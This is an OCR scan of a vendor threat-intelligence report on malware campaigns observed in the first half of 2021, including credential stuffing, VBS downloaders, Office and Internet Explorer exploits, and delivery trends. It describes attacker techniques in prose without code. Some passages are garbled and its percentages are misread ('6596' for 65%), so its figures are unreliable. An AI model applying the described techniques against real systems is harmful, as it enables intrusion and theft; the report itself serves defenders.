



E NF 


ш Шу 
ИШ ШЕ 
JE. 


OLF.SÉCURITY T 
P Id 


pp 


3 74 
23 = v no D^ 
53 # 
Ah Р 
5 B % dpt 
{ | 
Р, - 
a4 
ойы — » , 
/ E, e" 4 F 
2 Ж My 
А -- P" 
"t ^ 24 
4 p 
P 
La 
| 
| 


























HP WOLF SECURITY 


THREAT INSIGHTS 
REPORT 


1H 


- 2021 


al, HP WOLF SECURITY THREAT INSIGHTS REPORT 





THREAT LANDSCAPE 


Welcome to the 1H 2021 edition of the HP Wolf Security Threat Insights Report. Here our security experts highlight malware trends 
identified by HP Wolf Security from the first half of 2021 so that security teams are equipped with the knowledge to combat emerging 
threats and improve their security postures. 


Most attacks involving malware are financially motivated, meaning threat actors seek the quickest route to monetize their access. 

In the case of information stealers and remote access Trojans (RATS), this is typically selling confidential data stored on victims' 
computers. However, increasingly attackers are deciding to sell their access to other threat actors, especially if an infected system is 
joined to an Active Directory domain — an indicator that the system is part of a larger fleet that may be open to lateral movement. 


Cybercriminals' growing demand for unauthorized access has been largely driven by ransomware affiliates needing entry points into 
networks. Technological improvements to communication tools and hard-to-trace cryptocurrencies have also made it easier for 
threat actors to collaborate with each other, either directly as part of organized crews or indirectly by trading illicit goods and services. 
As aresult, unauthorized access sold by less-resourced threat actors may end up in the hands of well-funded and experienced 
ransomware-as-a-service (RaaS) affiliates. The initial compromise of one system can therefore escalate into an incident that has a 
large impact on business continuity. 


NOTABLE THREATS 


Hacking tools on the rise 


HP Wolf Security telemetry in H1 2021 saw a 6596 increase in hacking tools downloaded from filesharing websites and underground 
forums compared to the second half of 2020. One way to assess the risk posed by different types of threats is to consider the factors 
that drive and enable threat actors, such as desire, expectation, knowledge, and resources. The increase in hacking tool activity may 
indicate an increase in attacker intent, i.e. the desire to perform attacks and the expectation they will succeed. It also points to the 
widespread availability of hacking tools within the cybercrime ecosystem, i.e. the resources at the attackers’ disposal. A big driver of 
why hacking tools are so easy to obtain is widespread malware piracy or "cracking", enabling anyone to use tools without payment - 
even if developers intended otherwise. 
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Figure 1 – The main drivers of threats 

















Knowledge sharing also feeds into our threat assessment of hacking tools. Underground forums and chatrooms provide ideal 
platforms for threat actors to share tactics, techniques and procedures (TTPs), or buy and sell stolen data or unauthorized access. 
For example, in March, HP Wolf Security detected a user downloading a cracked copy of Sentry MBA from a Turkish-language 
cracking forum. This popular hacking tool is used to perform credential stuffing — a technique where attackers try to authenticate to 
websites using lists of compromised credentials.? Sentry MBA's capabilities include features to bypass website security controls, such 
as CAPTCHA challenges and web application firewalls. Threat actors can either use pre-bundled optical character recognition (OCR) 
computer vision models or configure the tool to query the APIs of third-party CAPTCHA-solving services during an attack. 
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Figures 2 & 3— A cracked сору of the Sentry MBA credential stuffing tool and CAPTCHA character sets, downloaded from a cracking forum 


As of July 2021, we found numerous active forums dedicated to sharing configurations and tips about using Sentry MBA against 
specific websites and devices, demonstrating the popularity of such tools and the low barrier to entry for this type of cybercrime. 
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Figure 4 — An English-language forum section dedicated to sharing Sentry MBA configurations in July 2021 
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Multi-stage downloader used to target business executives 


In March 2021, HP Wolf Security isolated a multi-stage Visual Basic Script (VBS) malware campaign targeting senior business 
executives. The targets received a malicious ZIP attachment by email, named using their first and last names. It is likely the threat 
actor obtained employee names and email addresses from publicly available information online. The archives contained an obfuscated 
VBS downloader that downloads a second VBS script from a remote server to the user's %TEMP% folder. The first stage script was 
heavily obfuscated and had a low detection rate - only 2196 of anti-virus scanners on VirusTotal detected it as malicious. 





The second stage was downloaded using BITSAdmin, a legitimate file transfer tool built into Windows. Threat actors commonly 
employ a tactic known as living off the land, where operating system administrative tools and features are used to perform malicious 
actions, which reduce the likelihood of detection. To establish persistence on the system, the script creates a scheduled task to run the 
file with Windows Script Host (cscript.exe). 
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Figure 5 — An isolated sample of the VBS downloader in HP Wolf Security Controller showing a BITSAdmin download command 


The second stage downloads a third obfuscated VBS file using BITSAdmin to %LOCALAPPDATA%\Temp. Depending on the size of 
the downloaded file, the third stage is either run as a VBS file or as a portable executable — possibly a final payload. The attacker’s 
command and control (C2) infrastructure was not actively serving the third stage at the time of analysis, so it was not possible to 
confirm what malware would have been delivered. 


Businesses targeted in resume-themed phishing 
campaigns delivering Remcos 


In January 2021, HP Wolf Security isolated a malicious spam campaign 

targeting businesses in seven countries (Chile, Italy, Japan, Pakistan, TARGETED SECTORS: 
Philippines, UK, and US). The emails purported to be from job applicants + MANUFACTURING 

and contained malicious Rich Text Format (RTF) documents that exploited - SHIPPING 
CVE-2017-11882, a vulnerability in Microsoft Office’s Equation Editor. If . COMMODITY TRADING 
successfully exploited, the documents downloaded and ran Remcos on the . MARITIME 

infected system? The threat actor used a subdomain from a dynamic DNS . PROPERTY 

service (gotdns[.]ch) as their C2 server. Remcos is a commercially available . INDUSTRIAL SUPPLIES 
RAT giving backdoor access to an infected computer. 
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From Irfan Malikicma 

To ' 
On January 28, 2021 7:57 a.m. 

Subject Assistant Accounts Officer 
Attachments 


IRFAN AHMAD MALIK Resume with Cover letter..doc (850.89KB) 
@ Document-Office.Exploit.CVE-2017-11882 


Figure 6 — Malicious email posing as job applicant 


CryptBot used to distribute DanaBot 


In May 2021, HP Wolf Security detected a campaign delivering CryptBot, an information stealer that harvests system and web browser 
credentials and cryptocurrency wallets. Rather than being used as an infostealer, CryptBot was used to drop a banking Trojan, DanaBot, 
as a follow-up infection. DanaBot is a family of malware associated with the financial crime group TA547^ Threat actors regularly 
repurpose malware and other tools by using them to achieve objectives that they weren't necessarily developed for, such as using a 
stealer to deploy other malware. 
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Figure 7 — Process interaction graph showing CryptBot downloading and running DanaBot, safely inside an HP Wolf Security micro-VM 


Code reuse rife among commodity information-stealing malware 


Snake is a modular .NET keylogger and credential stealer first spotted in late November 2020. In H1 2021, the HP threat research 

team has regularly seen malicious spam campaigns distributing this malware family in RTF or archive attachments. An analysis of 
Snake's code revealed similarities between it and four other keylogger families active in the last two years.? This "remix" behavior of 
opportunistically copying source code from established malware families demonstrates how easy it is for cybercriminals to create their 
own malware-as-a-service businesses — and the importance for enterprise defenses to stay ahead of malware developers. 
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Figure 8 — Comparison of keystroke exfiltration functions between Snake and Matiex keyloggers 


Purple Fox compromises Internet Explorer 
users with CVE-2021-26411 exploit 


HP Wolf Security telemetry saw an increase in the number of 


isolated Purple Fox exploit kit 


In one campaign in April 2021, 


EK) samples encountered by users. 


HP Wolf Security prevented a 


customer from compromise because their web browser session 


was running inside a micro-VM 
amemory corruption vulnerab 
26411), anew addition to Purp 





5 The sample attempted to exploit 
ility in Internet Explorer (CVE-2021- 
e Fox’s exploit arsenal.’ The exploit 


code resembled a proof of concept (PoC) released to the public in 
mid-March 2021. The time from the PoC to in the wild sightings 
was a matter of weeks, meaning organizations only had a small 
window to patch before risking compromise by Purple Fox. 





The user encountered Purple Fox after searching for the term 
“Оез -Opxs»-)uob-" (“Form-extension-visit-” in Arabic) in a 
search engine. The user clicked on a search result (loislandgrafT.] 
us), which then led them to a webpage that attempted to deliver 
the exploit via several redirects. During the analysis, we noticed 
that the exploit was not triggered in every case, likely because geo-fencing was used to control which systems were compromised. 
den, and Japan were among the countries that triggered the infection chain, although this is not an 








Italy, Switzerland, Ireland, Swe 
exhaustive list. 








NOTABLE TRENDS 


Archives are now the most 
file type 


popular malware delivery 


Archives were the top malware delivery file type in H1 2021, 
overtaking documents in H2 2020. The increase was partially 
driven by attackers switching to malicious Java Archive files (JAR) 
to deliver their malware in email attachments. When opened, 

the JAR files unpack and run a payload on the victim's PC if JAVA 
Runtime Environment is installed. The most common payloads we 
saw were low-cost RATS that are easily bought or obtained from 
underground marketplaces, such as AdWind. 
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Figure 9 – Timeline showing the history of CVE-2021-26411 


ISOLATED TREATS BY 
FILE TYPE Hi 2021 


SPREADSHEETS d 
EXECUTABLES [mmm 
DOCUMENTS = 


WEB PAGES | 
PRESENTATIONS | 
PDFs | 


OTHER || 


Figure 10 — Threats isolated by HP Wolf Security by file type in 1H 2021 
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The top email lures associated with these campaigns were purchase orders, invoices, product specifications, RFQs, and quality control 
reports - suggesting that the attackers are interested in targeting businesses rather than individuals. 


We also saw a continuation of attacks involving unusual archive file types to deliver commodity malware, for example by compressing 
malware inside .Z, .ARJ, and .XZ archives. One reason why attackers might prefer exotic file types is that email gateway scanners are 
less likely to be able to decompress and examine files that use unpopular formats, thereby increasing the chances of a malicious email 
reaching a target’s inbox. 


Excel spreadsheets were the second most popular file type used to deliver malware. This was driven by large malicious spam 
campaigns distributing crimeware families such as Dridex, IcedID, and TrickBot. We also saw attackers distribute commodity stealers 
such as Formbook using Excel spreadsheets, but on a much smaller scale. HP Wolf Security data suggests that crimeware actors 
prefer to use spreadsheets to deliver their malware, while smaller, less organized actors prefer to use archives. 





Compared to H2 2020, HP Wolf Security telemetry saw a 
2496 increase in threats downloaded using web browsers. 


This was partially driven by users downloading hacking tools Q 
and cryptocurrency mining software. Email remained the Q 


top infection vector, with 7596 of threats isolated by HP Wolf 


Security delivered by email in H1 2021. About one third (3496) OF THREATS ISOLATED HP WOLF 
of threats were unknown by hash to anti-virus scanners at SECURITY WERE DELIVERED BY 
the time of detection in 1H 2021, a 496 drop from 2H 2020. EMAIL IN H1 2021. THE REMAINING 


25% WERE WEB DOWNLOADS. 


COVID-19 email lures fall out of fashion 

Nearly half (4996) of lures used in malicious emails isolated by HP Wolf Security were themed as business transactions. This 
demonstrates that while cybercriminals are becoming more organized, users are still falling for the same old tricks, downloading risky 
files and clicking on malicious attachments and compromised web links. 

Less than 196 of isolated emails used COVID-19 as a lure, suggesting that this topical lure is less effective at tricking users into clicking 


malicious links and attachments. Malware distributors are motivated to maximize their click rates, so prefer to use lures that have 
proven effective generically across different regions. 


TOP EMAIL LURES H1 2021 
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Figure 11 — Top email lures of threats isolated by HP Wolf Security in H1 2021 
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Dridex overtakes Emotet following law enforcement takedown 


Before the takedown of Emotet on 27 January 2021 by law enforcement agencies, we saw large Emotet campaigns targeting Japanese 
organizations using lures created from stolen email threads — a technique called email thread hijacking.’ Following the takedown, the 
proportion of malware being distributed via Word documents fell significantly because Emotet's operators preferred to use a Word- 
based downloader. 


The drop in Emotet activity in Q1 2021 has led to Dridex becoming the top malware family isolated by HP Wolf Security. Although 
originating in 2012 as a banking Trojan, since 2017 Dridex's operators have increasingly shifted their preferred monetization method to 
ransomware attacks.? Emotet was known to distribute malware associated with other organized threat groups, suggesting that their 
business model involved selling access to hosts compromised by the former banking Trojan. 
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From address 


To 

On January 21, 2021 2:45 a.m. 

Subject теше "Turntable cleaning" 

Attachments я хос 5 RHA ts doc (150.53k8) Inquiries regarding service 
Ф Document-Word.Trojan.Emotet provision.doc 


Figure 12 - Stolen email data used by Emotet to generate a convincing Japanese-language phishing template 


Threat actors continue to exploit old Microsoft Office vulnerabilities 


Threat actors are continuing to exploit old vulnerabilities in Microsoft Office, underlining the need for enterprises to patch out-of-date 
Office versions in their environments. We saw a 24% increase in CVE-2017-11882 exploits in H1 2021 compared to H2 2020. Otherwise, 
there was no significant change in the vulnerabilities exploited by attackers over the reporting period. 
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Figures 13 & 14— Тор malware families and exploited CVEs isolated by HP Wolf Security in H1 2021 
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Figure 15 — MITRE ATT&CK techniques used by threats isolated by HP Wolf Security in H1 20219 


NOTABLE TECHNIQUES 


Detecting the domain infrastructure of TA551 and TA505 


Threat actors tend to be habitual and follow well-defined patterns of behavior. The HP Threat Research team discovered a technique to 
pre-emptively detect the domains used by two threat groups — TA551 and TA505 - before they are used in active malware campaigns. 
By examining keyword patterns in their domains, their preferred DNS providers, and domain registrars, it was possible to identify the 
domain infrastructure of these groups. 


TA505 is a financially motivated threat group first identified in 2014. In recent years their preferred way of making money is by 
extorting victims after infecting them with ClOp ransomware. The group typically gains access to their victim networks using Get2 
and SDBBot malware. Before each campaign, the group would register new domains that they would use for malware command and 
control. 


TA551 is a malware distribution group that has been active since the beginning of 2019. They have been seen spreading malware 
families including Ursnif, Valak, IcedID, and Qakbot. 
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Figure 16 — Preferred DNS providers of TA551 over time 
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INDICATORS AND TOOLS 


The HP Threat Research team regularly publishes Indicators of Compromise (IOCs), signatures, and tools to help security teams defend 
against threats. You can access these resources from the HP Threat Research GitHub repository.” 


STAY CURRENT 


The HP Wolf Security Threat Insights Report is made possible by customers who opt to share their threats with HP. Alerts that are 
forwarded to us are analyzed by our security experts and annotated with additional contextual information about each threat. 


We recommend that customers take the following actions to ensure that you get the most out of your HP Wolf Enterprise Security 
deployments:? 


* Enable Threat Intelligence Services and Threat Forwarding in HP Wolf Security Controller. These enable augmented threat 
intelligence for automated threat triage and labeling, plus automatic rules file updates to ensure accurate detection and protection 
against the latest attack techniques. To learn more, review the Knowledge Base articles about these features. 13 


* Plan to update HP Wolf Security Controller with every new release to receive new dashboards and report templates. See the latest 
release notes and software downloads available on the Customer Portal.” 





* Update HP Wolf Security endpoint software at least twice a year to stay current with detection rules added by our threat research 
team. For the latest threat research, head over to the HP Wolf Security blog, where our security experts regularly dissect new threats 
and share their findings." 


ABOUT THE HP WOLF SECURITY THREAT 
INSIGHTS REPORT 


Enterprises are most vulnerable from users opening email attachments, clicking on hyperlinks in emails, and downloading files from 
the web. HP Wolf Security protects the enterprise by isolating risky activity in micro-VMs, ensuring that malware cannot infect the host 
computer or spread onto the corporate network. Since the malware is contained, HP Wolf Security collects rich forensic data to help our 
customers harden their infrastructure. The HP Wolf Security Threat Insights Report highlights notable malware campaigns analyzed by 
our threat research team so that our customers are aware of emerging threats and can take action to protect their environments. 


ABOUT HP WOLF SECURITY 


From the maker of the world's most secure PCs‘ and Printers?, HP Wolf Security is a new breed of endpoint security. HP's portfolio of 
hardware-enforced security and endpoint-focused security services are designed to help organizations safeguard PCs, printers, and 
people from circling cyber predators. HP Wolf Security provides comprehensive endpoint protection and resiliency that starts at the 
hardware level and extends across software and services. 
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HP Wolf Enterprise Security is an optional service and may include offerings such as HP Sure Click Enterprise and HP Sure Access Enterprise. HP Sure Click 
Enterprise requires Windows 8 or 10 and Microsoft Internet Explorer, Google Chrome, Chromium or Firefox are supported. Supported attachments include 
Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. HP Sure Access Enterprise requires Windows 10 
Pro or Enterprise. HP services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. 
Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of 
service or the HP Limited Warranty provided with your HP Product. For full system requirements, please visit www.hpdaas.com/requirements. 








. HP Wolf Security Controller requires HP Sure Click Enterprise or HP Sure Access Enterprise. HP Wolf Security Controller is a management and analytics platform 





that provides critical data around devices and applications and is not sold as astandalone service. HP Wolf Security Controller follows stringent GDPR privacy 
regulations and is 15027001, 15027017 and SOC? Туре 2 certified for Information Security. Internet access with connection to the HP Cloud is required. For full 
system requirements, please visit http://www.hpdaas.com/requirements. 








. Based on HP's unique and comprehensive security capabilities at no additional cost among vendors on HP Elite PCs with Windows and 8th Gen and higher Intel? 


processors or AMD Ryzen™ 4000 processors and higher; HP ProDesk 600 G6 with Intel? 10th Gen and higher processors; and HP ProBook 600 with AMD Ryzen™ 
4000 or Intel? 11th Gen processors and higher. 


. HP's most advanced embedded security features are available on HP Enterprise and HP Managed devices with HP FutureSmart firmware 4.5 or above. Claim 


based on HP review of 2021 published features of competitive in-class printers. Only HP offers a combination of security features to automatically detect, stop, 
and recover from attacks with a self-healing reboot, in alignment with NIST SP 800-193 guidelines for device cyber resiliency. For a list of compatible products, 
visit: hp.com/go/PrintersThatProtect. For more information, visit: hp.com/go/PrinterSecurityClaims. 


. HP Security is now HP Wolf Security. Security features vary by platform, please see product data sheet for details. 
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